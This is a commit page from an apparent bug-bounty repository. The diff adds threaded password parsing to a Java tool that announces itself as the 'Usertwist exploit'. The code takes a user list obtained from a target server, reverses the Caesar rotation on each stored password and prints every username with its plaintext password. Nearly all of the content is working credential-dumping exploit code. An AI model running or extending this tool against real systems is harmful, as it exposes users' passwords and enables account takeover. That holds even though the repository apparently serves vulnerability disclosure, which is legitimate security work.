Stage/bug-bounty-reports
4
0
Fork 0
Code Issues 3 Pull Requests Actions Packages Projects Releases 2 Wiki Activity

Asynchronous passwords parsing

Browse Source
This commit is contained in:
Mateo
2024-08-02 09:02:11 +02:00
parent 7207b3dca1
commit e1e4a26e62
3 changed files with 52 additions and 8 deletions
Download Patch File Download Diff File Expand all files Collapse all files

25
src/fr/motysten/usertwist/exploit/Main.java
View File

@@ -1,6 +1,6 @@
package fr.motysten.usertwist.exploit;
import fr.motysten.usertwist.exploit.tools.Cesar;
import fr.motysten.usertwist.exploit.tools.Parser;
import fr.motysten.usertwist.exploit.tools.Request;
import org.json.JSONArray;
import org.json.JSONObject;
@@ -13,6 +13,7 @@ import java.io.InputStreamReader;
import java.net.http.HttpResponse;
import java.security.KeyManagementException;
import java.security.NoSuchAlgorithmException;
import java.util.Arrays;
import java.util.HashMap;
import java.util.Map;
@@ -24,10 +25,15 @@ public class Main {
public static String port = "443";
public static int rotation = 4;
public static boolean insecure = false;
public static boolean asynchronous = true;
public static void main(String[] args) throws IOException, InterruptedException, NoSuchAlgorithmException, KeyManagementException {
BufferedReader reader = new BufferedReader(new InputStreamReader(System.in));
if (Arrays.asList(args).contains("--synchronous") || Arrays.asList(args).contains("-s")) {
asynchronous = false;
}
System.out.println("Usertwist exploit by Motysten");
System.out.println("Please don't use for unethical purpose !\n");
String readLine;
@@ -124,13 +130,18 @@ public class Main {
System.out.println(usersArray.length() + " users found !");
System.out.println("\nDecrypting passwords...\n");
for (int i = 0; i < usersArray.length(); i++) {
JSONObject user = usersArray.getJSONObject(i);
String login = user.getString("username");
String password = Cesar.cesarRotate(user.getString("data"), rotation);
System.out.println((i + 1) + ". " + login + " => " + password);
if (asynchronous) {
float startTime = System.nanoTime();
Parser.asyncGetPass(usersArray, rotation);
float elapsedTime = (System.nanoTime() - startTime) / 1000000;
System.out.println("Asynchronous elapsed time = " + elapsedTime + "ms");
} else {
float startTime = System.nanoTime();
Parser.getPass(usersArray, rotation);
float elapsedTime = (System.nanoTime() - startTime) / 1000000;
System.out.println("Synchronous elapsed time = " + elapsedTime + "ms");
}
}
}

2
src/fr/motysten/usertwist/exploit/tools/Cesar.java
View File

@@ -12,7 +12,7 @@ public class Cesar {
}
StringBuilder output = new StringBuilder();
for (int i = 0; i < input.length(); i++) {
char newChar = input.charAt(i);
if (!Character.isDigit(input.charAt(i))) {

33
src/fr/motysten/usertwist/exploit/tools/Parser.java Normal file
View File

@@ -0,0 +1,33 @@
package fr.motysten.usertwist.exploit.tools;
import org.json.JSONArray;
import org.json.JSONObject;
public class Parser {
public static void getPass(JSONArray usersArray, int rotation) {
for (int i = 0; i < usersArray.length(); i++) {
JSONObject user = usersArray.getJSONObject(i);
String login = user.getString("username");
String password = Cesar.cesarRotate(user.getString("data"), rotation);
System.out.println((i + 1) + ". " + login + " => " + password);
}
}
public static void asyncGetPass(JSONArray usersArray, int rotation) {
for (int i = 0; i < usersArray.length(); i++) {
int finalI = i;
new Thread(() -> {
JSONObject user = usersArray.getJSONObject(finalI);
String login = user.getString("username");
String password = Cesar.cesarRotate(user.getString("data"), rotation);
System.out.println((finalI + 1) + ". " + login + " => " + password);
}).start();
}
}
}